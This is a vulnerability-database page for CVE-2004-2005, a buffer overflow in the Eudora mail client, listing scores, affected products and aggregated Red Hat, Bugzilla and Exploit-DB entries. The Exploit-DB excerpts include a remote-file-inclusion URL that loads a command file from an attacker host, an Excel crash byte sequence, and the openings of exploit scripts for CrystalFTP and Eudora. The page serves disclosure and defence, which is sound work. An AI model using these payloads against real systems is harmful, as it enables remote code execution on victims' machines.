CVE-2004-2005
published 2004-05-06CVE-2004-2005: Buffer overflow in Eudora for Windows 5.2.1, 6.0.3, and 6.1 allows remote attackers to execute arbitrary code via an e-mail with (1) a link to a long URL to…
PriorityP426medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
3.49%
87.7th percentile
Buffer overflow in Eudora for Windows 5.2.1, 6.0.3, and 6.1 allows remote attackers to execute arbitrary code via an e-mail with (1) a link to a long URL to the C drive or (2) a long attachment name.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | microsoft_forefront_endpoint_protection_2010 | — | — |
| msrc | microsoft_security_essentials | — | — |
| msrc | microsoft_system_center_2012_endpoint_protection | — | — |
| msrc | microsoft_system_center_2012_r2_endpoint_protection | — | — |
| msrc | microsoft_system_center_endpoint_protection | — | — |
| msrc | windows_defender | — | — |
| qualcomm | eudora | — | — |
| qualcomm | eudora | — | — |
| qualcomm | eudora | — | — |
| qualcomm | eudora | — | — |
| qualcomm | eudora | — | — |
CVSS provenance
nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
vendor_redhat10.0CRITICAL
vendor_msrc7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rhhf-gqg6-mv8h: Buffer overflow in Eudora for Windows 5
ghsa_unreviewed·2022-04-29
CVE-2004-2005 [MEDIUM] GHSA-rhhf-gqg6-mv8h: Buffer overflow in Eudora for Windows 5
Buffer overflow in Eudora for Windows 5.2.1, 6.0.3, and 6.1 allows remote attackers to execute arbitrary code via an e-mail with (1) a link to a long URL to the C drive or (2) a long attachment name.
Red Hat
ncompress: insecure tmp file handling may lead to file overwrite
vendor_redhat·2021-11-09·CVSS 2.1
CVE-2005-2991 [LOW] CWE-59 ncompress: insecure tmp file handling may lead to file overwrite
ncompress: insecure tmp file handling may lead to file overwrite
ncompress 4.2.4 and earlier allows local users to overwrite arbitrary files via a symlink attack on temporary files using (1) zdiff or (2) zcmp, a different vulnerability than CVE-2004-0970.
Statement: Not vulnerable. This issue did not affect the ncompress packages as distributed with Red Hat Enterprise Linux 2.1, 3, or 4.
Package: ncompress (Red Hat Enterprise Linux 6) - Not affected
Package: ncompress (Red Hat Enterprise Linux 7) - Not affected
Package: ncompress (Red Hat Enterprise Linux 8) - Not affected
Red Hat
perl: File:: Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
vendor_redhat·2008-11-19·CVSS 2.6
CVE-2008-5302 [LOW] perl: File:: Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
perl: File:: Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
Race condition in the rmtree function in File::Path 1.08 and 2.07 (lib/File/Path.pm) in Perl 5.8.8 and 5.10.0 allows local users to create arbitrary setuid binaries via a symlink attack, a different vulnerability than CVE-2005-0448, CVE-2004-0452, and CVE-2008-2827. NOTE: this is a regression error related to CVE-2005-0448. It is different from CVE-2008-5303 due to affected versions.
Red Hat
security flaw
vendor_redhat·2004-12-15·CVSS 10.0
CVE-2004-1287 [CRITICAL] security flaw
security flaw
Buffer overflow in the error function in preproc.c for NASM 0.98.38 1.2 allows attackers to execute arbitrary code via a crafted asm file, a different vulnerability than CVE-2005-1194.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Red Hat
security flaw
vendor_redhat·2002-03-15·CVSS 4.3
CVE-2004-0804 [MEDIUM] security flaw
security flaw
Vulnerability in tif_dirread.c for libtiff allows remote attackers to cause a denial of service (application crash) via a TIFF image that causes a divide-by-zero error when the number of row bytes is zero, a different vulnerability than CVE-2005-2452.
No detection rules found.
Exploit-DB
Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
exploitdb·2006-07-01
CVE-2006-3375 Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
---
Title : randshop <= 1.1.1 Remote File Inclusion Vulnerability
-
URL : http://www.randshop.com/
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
dork : "software 2004-2005 by randshop"
-
exploit : http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
-
greatz : Renzokuzen, skulmatic, sikunYuk, ulga, bigmaster, cgibin, weleh, and all #papmahackerlink crew
-
# milw0rm.com [2006-07-01]
Exploit-DB
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
exploitdb·2005-12-08
CVE-2005-4131 Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
---
source: https://www.securityfocus.com/bid/15780/info
Microsoft Excel is susceptible to a remote code-execution vulnerability. This issue was originally disclosed through an eBay auction that has since been terminated.
This issue is due to the application's failure to properly bounds-check user-supplied input data in the 'Named Range' definition in Excel data files. This results in the corruption of critical memory sections, allowing code execution.
The following is a proof-of-concept example segment of an Excel data file. The '*' characters represent the location of the affected value that triggers this issue. Setting these locations to '0xFF' will crash the application.
00000720 00 80 00 ff 93 02 04 00
Exploit-DB
CrystalFTP Pro 2.8 - Remote Buffer Overflow
exploitdb·2005-04-24
CVE-2004-1327 CrystalFTP Pro 2.8 - Remote Buffer Overflow
CrystalFTP Pro 2.8 - Remote Buffer Overflow
---
/*
* CrystalFTP Pro v2.8 Buffer Overflow Exploit
*
* 04/25/2005
*
* despite the fact that nobody uses CrystalFTP
* i had to release a new version that replaces
* the first one.
*
* this overwrites the structured exception handler
* with a "pop edx pop eax ret" in kernel32.dll.
* this takes us to a pointer of the next SEH.
* just jmp over the SEH itself and reverse code
* gets executed.
*
* add more targets if needed
*
* have phun
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ local
Exploit-DB
Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun
exploitdb·2004-05-07
CVE-2004-2005 Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun
Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun
---
source: https://www.securityfocus.com/bid/10298/info
Qualcomm Eudora is reported to be prone to a remotely exploitable buffer overrun vulnerability.
The issue is exposed when an excessively long hyperlink to a file resource is embedded in an HTML e-mail. This may permit remote attackers to execute arbitrary code via malicious e-mail in the context of the client user.
This issue was reported in Eudora on Windows platforms. Eudora for Apple Mac operating systems may be similarly affected, though this has not been confirmed.
#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";
print "Th
Bugzilla
CVE-2008-5302 perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
bugzilla·2008-11-28·CVSS 2.6
CVE-2008-5302 [LOW] CVE-2008-5302 perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
CVE-2008-5302 perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
Created attachment 325021
Ours perl-5.8.0-CAN-2005-0448-rmtree.patch applied against perl_5.8.0-90.4
Common Vulnerabilities and Exposures originally assigned an identifier CVE-2005-0448 to the following vulnerability:
Race condition in the rmtree function in File::Path.pm in Perl before 5.8.4 allows local users to create arbitrary setuid binaries in the tree being
deleted, a different vulnerability than CVE-2004-0452.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0448
It was discovered that after upstream perl rebase to 5.8.8-1, this issue
was reintroduced (seems upstream didn't apply fix for CVE-2005-0448).
This issue already fixed again in perl-5.1
Bugzilla
CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
bugzilla·2006-06-02·CVSS 5.0
CVE-2006-0052 [MEDIUM] CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
Mailman DoS allows remote attackers to cause a denial of service by using
multipart MIME message with a single part MIME message.
Mailman cross site scripting bug allows remote attackers to inject arbitrary web
script in the form ofaction argument.
In Mailman Denial of Service application crash and server message "fail with an
Overflow on bad date data in a processed message".
http://www.redhat.com/archives/fedora-test-list/2006-May/msg00131.html
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00134.htm
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00135.
Bugzilla
CAN-2004-1304, File ELF Header Unspecified Buffer Overflow
bugzilla·2004-12-07
[MEDIUM] CAN-2004-1304, File ELF Header Unspecified Buffer Overflow
CAN-2004-1304, File ELF Header Unspecified Buffer Overflow
04.48.16 CVE: Not Available
Platform: Unix
Title: File ELF Header Unspecified Buffer Overflow
Description: The Unix file command is affected by a buffer overflow
vulnerability. This issue is due to a failure of the application to
properly validate string lengths in the affected files prior to
copying them into static process buffers. This can be leveraged by an
attacker to execute hostile code on the vulnerable system.
Ref: http://www.securityfocus.com/advisories/7566
------- Additional Comments From [email protected] 2004-12-14 08:40:43 ----
gentoo has an advisory on it, now, too:
http://www.gentoo.org/security/en/glsa/glsa-200412-07.xml
------- Additional Comments From [email protected] 2005-02-15 07:21:09 ----
T
http://lists.netsys.com/pipermail/full-disclosure/2004-May/021059.htmlhttp://marc.info/?l=bugtraq&m=108395487628044&w=2http://secunia.com/advisories/11568http://www.eudora.com/download/eudora/windows/6.1.1/RelNotes.txthttp://www.securityfocus.com/bid/10298https://exchange.xforce.ibmcloud.com/vulnerabilities/16086http://lists.netsys.com/pipermail/full-disclosure/2004-May/021059.htmlhttp://marc.info/?l=bugtraq&m=108395487628044&w=2http://secunia.com/advisories/11568http://www.eudora.com/download/eudora/windows/6.1.1/RelNotes.txthttp://www.securityfocus.com/bid/10298https://exchange.xforce.ibmcloud.com/vulnerabilities/16086
2004-05-06
Published